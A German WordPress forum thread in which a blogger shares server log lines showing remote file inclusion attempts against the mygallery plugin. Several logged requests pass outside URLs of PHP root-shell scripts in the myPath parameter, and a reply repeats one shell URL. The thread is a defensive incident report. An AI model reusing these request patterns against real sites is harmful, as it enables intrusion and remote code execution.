Sicherheitslücke in mygallery?

  • Sicherheitslücke in mygallery? Gelöst.

    Hallo zusammen.

    Entschuldigt bitte meinen etwas reißerischen Titel, aber ich hab da einen etwas seltsamen Fall, mit dem ich nicht weiterkomme.

    Folgende Bounce-Mail habe ich bekommen:

    Da ist offensichtlich eine Mail generiert worden, deren Adressat nicht existiert. Was mich wundert, sind die zurückgemailten Header-Zeilen, insbesondere die Zeile X-PHP-Script. Was bitte hat die Datei mygallerybrowser.php damit zu tun? Auch die in der From-Zeile erwähnte Mail-Adresse wird von mir gar nicht benutzt.

    In den Server-Logs finde ich diesbezüglich folgende Zugriffe, hier mal ein paar Beispiel-Zeilen:

    Code
    80.67.26.187 - - [05/Aug/2008:19:18:08 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 200 485 "-" "libwww-perl/5.808" "www.auf-n-ab.de"
    85.57.26.164 - - [09/Aug/2008:17:58:33 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.lycos.es/w0rms/sp.txt? HTTP/1.1" 200 1563 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.auf-n-ab.de"
    217.172.29.12 - - [10/Aug/2008:02:20:48 +0200] "POST //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt?? HTTP/1.1" 200 778 "-" "libwww-perl/5.812" "www.auf-n-ab.de"
    217.172.22.207 - - [10/Aug/2008:18:40:00 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt?? HTTP/1.1" 200 34029 "-" "libwww-perl/5.805" "www.auf-n-ab.de"

    Leider bin ich hier mit meinem Latein am Ende und weiß nicht, ob und was ich dagegen unternehmen soll. Ist es nun eine Sicherheits-Lücke im Plug-In, wird dadurch mein Blog als Spam-Schleuder mißbraucht oder kann ich das getrost ignorieren?

    Mit der Bitte um Rat und Hilfe,
    Gruß Holger

    Es gehört mehr zum Leben, als es nur zu leben.

    Einmal editiert, zuletzt von timerix (13. August 2008 um 20:47)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Da versucht jemand ein russisches Rootshell PHP nachzuladen und das Plugin zu veranlassen, das Script auszuführen!

    Code
    http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt

    Dies ist laut Logfile das RootShell Script und immer noch downloadbar. Du solltest deinen Webspace sorgfältig ansehen (angefangen mit dem Plugin), ob dort Dateien liegen, die da nicht hingehören.

    Und für diejenigen, die wissen wollen, wie schlimm das wirklich ist, hier ein Video: http://www.milw0rm.com/video/watch.php?id=29

  • Vielen Dank für die Hinweise, gefunden hab ich auf meinem Webspace allerdings nix verdächtiges. Da aber sowieso das Update auch WP 2.6 anstand, hab ich das Blog gleich komplett neu aufgesetzt.

    Wie mir der Plugin-Author mittlerweile bestätigte, ist genau dieses Problem in der aktuellen Version längst behoben, und das schon seit über einem Jahr. Da hab ich tatsächlich nicht gemerkt, dass es ein Update gibt. *schäm*


    Gruß Holger

    Es gehört mehr zum Leben, als es nur zu leben.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!